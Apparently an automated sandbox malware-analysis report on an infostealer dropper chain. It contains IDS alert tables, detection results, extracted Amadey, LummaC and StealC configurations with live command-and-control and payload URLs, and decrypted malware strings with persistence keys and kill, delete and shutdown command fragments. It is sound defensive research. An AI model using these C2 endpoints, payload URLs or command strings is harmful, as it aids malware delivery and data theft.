2025-02-01T16:53:10.630501+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53502 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:12.452212+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53511 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:17.666512+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53533 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:20.386169+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53538 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:22.167297+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53542 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:24.232064+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53546 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:25.762915+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53548 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:28.148215+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53550 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:30.122840+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53564 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:31.649208+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53579 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:33.588434+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53592 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:35.210598+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53597 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:36.845879+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53621 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:38.408661+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53630 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:40.018999+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53632 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:41.627393+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53635 | 176.113.115.96 | 443 | TCP
2025-02-01T16:53:43.122485+0100 | 2028765 | 3 | Unknown Traffic | 192.168.2.11 | 53646 | 176.113.115.96 | 443 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-01T16:53:16.593251+0100 | 2059018 | 1 | A Network Trojan was detected | 192.168.2.11 | 53531 | 94.156.102.239 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-02-01T16:51:20.695996+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49707 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:21.652362+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49708 | 104.21.18.116 | 443 | TCP
2025-02-01T16:51:31.138733+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 49765 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:20.047505+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53469 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:21.157396+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53471 | 104.21.18.116 | 443 | TCP
2025-02-01T16:52:38.122744+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53485 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:31.962988+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53580 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:33.585498+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53591 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:35.896807+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53608 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:37.427915+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53622 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:47.814246+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53660 | 172.67.139.144 | 443 | TCP
2025-02-01T16:53:53.152709+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53666 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:56.332665+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53669 | 104.21.18.116 | 443 | TCP
2025-02-01T16:53:57.717762+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.11 | 53671 | 104.21.18.116 | 443 | TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:20.695996+010020498361A Network Trojan was detected192.168.2.1149707104.21.18.116443TCP
                            2025-02-01T16:52:20.047505+010020498361A Network Trojan was detected192.168.2.1153469104.21.18.116443TCP
                            2025-02-01T16:53:31.962988+010020498361A Network Trojan was detected192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:35.896807+010020498361A Network Trojan was detected192.168.2.1153608104.21.18.116443TCP
                            2025-02-01T16:53:56.332665+010020498361A Network Trojan was detected192.168.2.1153669104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:21.652362+010020498121A Network Trojan was detected192.168.2.1149708104.21.18.116443TCP
                            2025-02-01T16:52:21.157396+010020498121A Network Trojan was detected192.168.2.1153471104.21.18.116443TCP
                            2025-02-01T16:53:33.585498+010020498121A Network Trojan was detected192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:37.427915+010020498121A Network Trojan was detected192.168.2.1153622104.21.18.116443TCP
                            2025-02-01T16:53:57.717762+010020498121A Network Trojan was detected192.168.2.1153671104.21.18.116443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:31.472848+010020591501Domain Observed Used for C2 Detected192.168.2.1153580172.67.139.144443TCP
                            2025-02-01T16:53:32.754479+010020591501Domain Observed Used for C2 Detected192.168.2.1153591172.67.139.144443TCP
                            2025-02-01T16:53:37.190824+010020591501Domain Observed Used for C2 Detected192.168.2.1153626172.67.139.144443TCP
                            2025-02-01T16:53:39.229553+010020591501Domain Observed Used for C2 Detected192.168.2.1153631172.67.139.144443TCP
                            2025-02-01T16:53:40.731356+010020591501Domain Observed Used for C2 Detected192.168.2.1153634172.67.139.144443TCP
                            2025-02-01T16:53:42.240219+010020591501Domain Observed Used for C2 Detected192.168.2.1153640172.67.139.144443TCP
                            2025-02-01T16:53:45.159849+010020591501Domain Observed Used for C2 Detected192.168.2.1153656172.67.139.144443TCP
                            2025-02-01T16:53:47.289857+010020591501Domain Observed Used for C2 Detected192.168.2.1153660172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:14.587997+010020446961A Network Trojan was detected192.168.2.1153466185.215.113.4380TCP
                            2025-02-01T16:52:20.352535+010020446961A Network Trojan was detected192.168.2.1153470185.215.113.4380TCP
                            2025-02-01T16:52:25.177606+010020446961A Network Trojan was detected192.168.2.1153475185.215.113.4380TCP
                            2025-02-01T16:52:31.189286+010020446961A Network Trojan was detected192.168.2.1153479185.215.113.4380TCP
                            2025-02-01T16:52:36.764034+010020446961A Network Trojan was detected192.168.2.1153483185.215.113.4380TCP
                            2025-02-01T16:52:41.635076+010020446961A Network Trojan was detected192.168.2.1153487185.215.113.4380TCP
                            2025-02-01T16:52:54.920234+010020446961A Network Trojan was detected192.168.2.1153490185.215.113.4380TCP
                            2025-02-01T16:53:02.883452+010020446961A Network Trojan was detected192.168.2.1153497185.215.113.4380TCP
                            2025-02-01T16:53:13.228908+010020446961A Network Trojan was detected192.168.2.1153517185.215.113.4380TCP
                            2025-02-01T16:53:18.939349+010020446961A Network Trojan was detected192.168.2.1153534185.215.113.4380TCP
                            2025-02-01T16:53:23.451579+010020446961A Network Trojan was detected192.168.2.1153544185.215.113.4380TCP
                            2025-02-01T16:53:29.441470+010020446961A Network Trojan was detected192.168.2.1153563185.215.113.4380TCP
                            2025-02-01T16:53:36.034135+010020446961A Network Trojan was detected192.168.2.1153611185.215.113.4380TCP
                            2025-02-01T16:53:41.955829+010020446961A Network Trojan was detected192.168.2.1153636185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.519902+010020591891Domain Observed Used for C2 Detected192.168.2.11508291.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.878693+010020591911Domain Observed Used for C2 Detected192.168.2.11573441.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.741347+010020591991Domain Observed Used for C2 Detected192.168.2.11585741.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.670033+010020592011Domain Observed Used for C2 Detected192.168.2.11595671.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.696724+010020592031Domain Observed Used for C2 Detected192.168.2.11508081.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:30.920111+010020591491Domain Observed Used for C2 Detected192.168.2.11577561.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.782900+010020592071Domain Observed Used for C2 Detected192.168.2.11623251.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.808681+010020592091Domain Observed Used for C2 Detected192.168.2.11606281.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:31.639057+010020592111Domain Observed Used for C2 Detected192.168.2.11536471.1.1.153UDP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:02.568177+010020442471Malware Command and Control Activity Detected116.202.5.153443192.168.2.1153496TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:03.962444+010020518311Malware Command and Control Activity Detected116.202.5.153443192.168.2.1153498TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:02.567621+010020490871A Network Trojan was detected192.168.2.1153496116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:05.610852+010020593311Malware Command and Control Activity Detected192.168.2.1153500116.202.5.153443TCP
                            2025-02-01T16:53:06.716494+010020593311Malware Command and Control Activity Detected192.168.2.1153501116.202.5.153443TCP
                            2025-02-01T16:53:15.873678+010020593311Malware Command and Control Activity Detected192.168.2.1153526116.202.5.153443TCP
                            2025-02-01T16:53:16.533821+010020593311Malware Command and Control Activity Detected192.168.2.1153530116.202.5.153443TCP
                            2025-02-01T16:53:17.511372+010020593311Malware Command and Control Activity Detected192.168.2.1153532116.202.5.153443TCP
                            2025-02-01T16:53:19.609985+010020593311Malware Command and Control Activity Detected192.168.2.1153535116.202.5.153443TCP
                            2025-02-01T16:53:21.396019+010020593311Malware Command and Control Activity Detected192.168.2.1153539116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:23.030238+010020480941Malware Command and Control Activity Detected192.168.2.1149710104.21.18.116443TCP
                            2025-02-01T16:52:30.216233+010020480941Malware Command and Control Activity Detected192.168.2.1153478104.21.18.116443TCP
                            2025-02-01T16:53:42.496301+010020480941Malware Command and Control Activity Detected192.168.2.1153638104.21.18.116443TCP
                            2025-02-01T16:53:42.724070+010020480941Malware Command and Control Activity Detected192.168.2.1153640172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:51:40.419715+010020442431Malware Command and Control Activity Detected192.168.2.1153302185.215.113.11580TCP
                            2025-02-01T16:53:42.728482+010020442431Malware Command and Control Activity Detected192.168.2.1153639185.215.113.11580TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:05.024257+010028561471A Network Trojan was detected192.168.2.1153457185.215.113.4380TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:13.866327+010028561221A Network Trojan was detected185.215.113.4380192.168.2.1153464TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:08.792543+010028033053Unknown Traffic192.168.2.115346591.240.118.49443TCP
                            2025-02-01T16:52:15.357105+010028033053Unknown Traffic192.168.2.1153467185.215.113.9780TCP
                            2025-02-01T16:52:21.091320+010028033053Unknown Traffic192.168.2.1153472185.215.113.9780TCP
                            2025-02-01T16:52:25.915108+010028033053Unknown Traffic192.168.2.1153477185.215.113.9780TCP
                            2025-02-01T16:52:31.915191+010028033053Unknown Traffic192.168.2.1153480185.215.113.9780TCP
                            2025-02-01T16:52:37.535716+010028033053Unknown Traffic192.168.2.1153486185.215.113.9780TCP
                            2025-02-01T16:52:42.866744+010028033053Unknown Traffic192.168.2.1153488185.215.113.9780TCP
                            2025-02-01T16:52:55.725282+010028033053Unknown Traffic192.168.2.1153491185.215.113.9780TCP
                            2025-02-01T16:53:03.624490+010028033053Unknown Traffic192.168.2.1153499185.215.113.9780TCP
                            2025-02-01T16:53:14.580712+010028033053Unknown Traffic192.168.2.1153520185.215.113.1680TCP
                            2025-02-01T16:53:19.794761+010028033053Unknown Traffic192.168.2.1153537185.215.113.1680TCP
                            2025-02-01T16:53:24.264409+010028033053Unknown Traffic192.168.2.1153547185.215.113.9780TCP
                            2025-02-01T16:53:30.333824+010028033053Unknown Traffic192.168.2.1153565185.215.113.1680TCP
                            2025-02-01T16:53:37.139429+010028033053Unknown Traffic192.168.2.1153623185.215.113.1680TCP
                            2025-02-01T16:53:42.730527+010028033053Unknown Traffic192.168.2.1153643185.215.113.1680TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:11.287192+010028032742Potentially Bad Traffic192.168.2.1153502176.113.115.96443TCP
                            2025-02-01T16:53:12.920886+010028032742Potentially Bad Traffic192.168.2.1153511176.113.115.96443TCP
                            2025-02-01T16:53:18.134053+010028032742Potentially Bad Traffic192.168.2.1153533176.113.115.96443TCP
                            2025-02-01T16:53:20.851708+010028032742Potentially Bad Traffic192.168.2.1153538176.113.115.96443TCP
                            2025-02-01T16:53:22.956384+010028032742Potentially Bad Traffic192.168.2.1153542176.113.115.96443TCP
                            2025-02-01T16:53:24.691914+010028032742Potentially Bad Traffic192.168.2.1153546176.113.115.96443TCP
                            2025-02-01T16:53:26.229965+010028032742Potentially Bad Traffic192.168.2.1153548176.113.115.96443TCP
                            2025-02-01T16:53:28.609292+010028032742Potentially Bad Traffic192.168.2.1153550176.113.115.96443TCP
                            2025-02-01T16:53:30.586118+010028032742Potentially Bad Traffic192.168.2.1153564176.113.115.96443TCP
                            2025-02-01T16:53:32.120669+010028032742Potentially Bad Traffic192.168.2.1153579176.113.115.96443TCP
                            2025-02-01T16:53:34.046609+010028032742Potentially Bad Traffic192.168.2.1153592176.113.115.96443TCP
                            2025-02-01T16:53:35.669765+010028032742Potentially Bad Traffic192.168.2.1153597176.113.115.96443TCP
                            2025-02-01T16:53:37.305266+010028032742Potentially Bad Traffic192.168.2.1153621176.113.115.96443TCP
                            2025-02-01T16:53:38.876961+010028032742Potentially Bad Traffic192.168.2.1153630176.113.115.96443TCP
                            2025-02-01T16:53:40.474554+010028032742Potentially Bad Traffic192.168.2.1153632176.113.115.96443TCP
                            2025-02-01T16:53:42.092305+010028032742Potentially Bad Traffic192.168.2.1153635176.113.115.96443TCP
                            2025-02-01T16:53:43.581693+010028032742Potentially Bad Traffic192.168.2.1153646176.113.115.96443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:45.163621+010028438641A Network Trojan was detected192.168.2.1153656172.67.139.144443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:53:16.533821+010028596361Malware Command and Control Activity Detected192.168.2.1153530116.202.5.153443TCP
                            2025-02-01T16:53:17.511372+010028596361Malware Command and Control Activity Detected192.168.2.1153532116.202.5.153443TCP
                            2025-02-01T16:53:19.609985+010028596361Malware Command and Control Activity Detected192.168.2.1153535116.202.5.153443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:33.272781+010028586661Domain Observed Used for C2 Detected192.168.2.1153481104.102.49.254443TCP
                            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                            2025-02-01T16:52:59.385091+010028593781Malware Command and Control Activity Detected192.168.2.1153494116.202.5.153443TCP


                            AV Detection

                            Source: AApUa7VQiy.exe | Avira: detected
                            Source: http://185.215.113.115/c4becf79229cb002.phphkD | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.115/ws | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.115/c4becf79229cb002.php/ | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.16:80/steam/random.exe | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/initlosizz198hyjdr/random.exe | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.115 | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.43/Zu7JuNko/index.phpP | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.97/files/c0dxnfz/random.exe | Avira URL Cloud: Label: malware
                            Source: http://185.215.113.115/c4becf79229cb002.phpRs | Avira URL Cloud: Label: malware
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exe | Avira: detection malicious, Label: TR/Crypt.TPM.Gen
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                            Source: ktIplF5.exe.4272.15.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": "https://warlikedbeliev.org/api", "Build Version": "7tx2jo--659"}
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.7892.3.memstrmin | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php", "Botnet": "kira"}
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exe | ReversingLabs: Detection: 40%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exe | ReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exe | ReversingLabs: Detection: 29%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exe | ReversingLabs: Detection: 58%
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exe | ReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | ReversingLabs: Detection: 40%
                            Source: C:\Users\user\AppData\Local\Temp\1062121001\179187318e.exe | ReversingLabs: Detection: 58%
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exe | ReversingLabs: Detection: 75%
                            Source: C:\Users\user\AppData\Local\Temp\1062124001\61f0c6628c.exe | ReversingLabs: Detection: 66%
                            Source: C:\Users\user\AppData\Local\Temp\1062125001\4ee3234999.exe | ReversingLabs: Detection: 29%
                            Source: AApUa7VQiy.exe | Virustotal: Detection: 61%
                            Source: AApUa7VQiy.exe | ReversingLabs: Detection: 52%
                            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | Joe Sandbox ML: detected
                            Source: C:\ProgramData\Flv2AVIConverter\Flv2AVIConverter.exe | Joe Sandbox ML: detected
                            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\ktIplF5[1].exe | Joe Sandbox ML: detected
                            Source: AApUa7VQiy.exe | Joe Sandbox ML: detected
                            Source: 00000007.00000003.1546924160.0000000004970000.00000004.00001000.00020000.00000000.sdmp | String decryptor:
                                185.215.113.43
                                /Zu7JuNko/index.php
                                S-%lu-
                                abc3bc1985
                                skotes.exe
                                SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                Startup
                                cmd /C RMDIR /s/q
                                SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                rundll32
                                Programs
                                SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                %USERPROFILE%
                                cred.dll|clip.dll|
                                cred.dll
                                clip.dll
                                http://
                                https://
                                /quiet
                                /Plugins/
                                &unit=
                                shell32.dll
                                kernel32.dll
                                GetNativeSystemInfo
                                ProgramData\
                                AVAST Software
                                Kaspersky Lab
                                Panda Security
                                Doctor Web
                                360TotalSecurity
                                Bitdefender
                                Norton
                                Sophos
                                Comodo
                                WinDefender
                                0123456789
                                Content-Type: multipart/form-data; boundary=----
                                ------
                                ?scr=1
                                Content-Type: application/x-www-form-urlencoded
                                SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                ComputerName
                                abcdefghijklmnopqrstuvwxyz0123456789-_
                                -unicode-
                                SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                VideoID
                                DefaultSettings.XResolution
                                DefaultSettings.YResolution
                                SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                ProductName
                                CurrentBuild
                                rundll32.exe
                                "taskkill /f /im "
                                " && timeout 1 && del
                                && Exit"
                                " && ren
                                Powershell.exe
                                -executionpolicy remotesigned -File "
                                shutdown -s -t 0
                                random

                            Compliance

                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exeUnpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack
                            Source: AApUa7VQiy.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Flv to AVI Converter_is1
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49707 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49708 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49710 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49719 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49727 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49742 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49750 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:49765 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 91.240.118.49:443 -> 192.168.2.11:53465 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53469 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53471 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53473 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53474 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53476 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53478 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.11:53481 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53482 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53485 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 176.113.115.96:443 -> 192.168.2.11:53502 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53608 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53622 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53638 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53650 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53653 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53657 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53663 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53666 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53669 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53671 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.18.116:443 -> 192.168.2.11:53673 version: TLS 1.2
                            Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: f46bdbcca4.tmp, 00000020.00000003.2055762114.00000000034D8000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000003.2051282895.00000000031A0000.00000004.00001000.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\36469
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\
                            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\

                            Networking

                            Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.11:53302 -> 185.215.113.115:80
                            Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.11:53457 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.11:53464
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53466 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53470 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.11:53475 -> 185.215.113.43:80
                            Source: Network trafficSuricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.11:50829 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.11:59567 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.11:53647 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.11:60628 -> 1.1.1.1:53
                            Source: Network trafficSuricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.11:57344 -> 1.1.1.1:53
